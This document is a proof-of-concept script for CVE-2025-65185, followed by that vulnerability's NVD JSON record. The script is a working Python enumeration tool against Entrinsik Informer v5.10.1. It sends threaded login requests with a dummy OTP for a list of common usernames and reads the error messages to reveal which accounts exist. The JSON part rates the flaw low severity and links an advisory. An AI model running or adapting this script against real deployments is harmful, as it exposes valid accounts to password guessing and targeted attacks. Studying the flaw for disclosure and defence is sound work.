CVE-2025-65185

# CVE-2025-65185 Username Enumeration PoC # Affected: Entrinsik Informer v5.10.1 # Type: Username Enumeration via OTP Login import requests import json import sys from concurrent.futures import ThreadPoolExecutor TARGET_URL = "http://target-entrinsik-informer.com" def test_username(username): """ Test if a username exists by attempting OTP verification """ endpoint = f"{TARGET_URL}/api/auth/verify-otp" # Payload with arbitrary OTP and password payload = { "username": username, "otp_code": "000000", "new_password": "TestPassword123!" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) # Analyze response to determine if username is valid if response.status_code == 400: data = response.json() error_msg = data.get("message", "").lower() # Different messages indicate different scenarios if "otp" in error_msg or "invalid otp" in error_msg: return {"username": username, "valid": True, "reason": "OTP error - user exists"} elif "user" in error_msg or "not found" in error_msg or "invalid" in error_msg: return {"username": username, "valid": False, "reason": "User not found"} return {"username": username, "valid": None, "reason": "Unknown response"} except Exception as e: return {"username": username, "valid": None, "error": str(e)} def enumerate_usernames(username_list, threads=10): """ Enumerate valid usernames from a list """ valid_users = [] with ThreadPoolExecutor(max_workers=threads) as executor: results = executor.map(test_username, username_list) for result in results: if result.get("valid"): print(f"[+] Valid user found: {result['username']} - {result['reason']}") valid_users.append(result['username']) else: print(f"[-] Invalid user: {result['username']}") return valid_users # Example usage if __name__ == "__main__": # Common usernames to test test_users = [ "admin", "administrator", "user", "test", "guest", "support", "info", "demo", "backup", "root" ] print("[*] CVE-2025-65185 Username Enumeration PoC") print(f"[*] Target: {TARGET_URL}") print("[*] Starting enumeration...") valid = enumerate_usernames(test_users) print(f"\n[!] Found {len(valid)} valid usernames") if valid: print("Valid users:", json.dumps(valid, indent=2))

{"cve": {"id": "CVE-2025-65185", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:50.537", "lastModified": "2026-01-05T15:06:28.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a username enumeration via local user login in Entrinsik Informer v5.10.1 which allows malicious users to enumerate users by entering an OTP code and new password then reviewing application responses."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:entrinsik:informer:5.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "3FE8E031-6663-4EE1-82EA-6B91C9A278AF"}]}]}], "references": [{"url": "https://entrinsik.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.triaxiomsecurity.com/entrinsik-informer-username-enumeration-cve-2025-65185/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}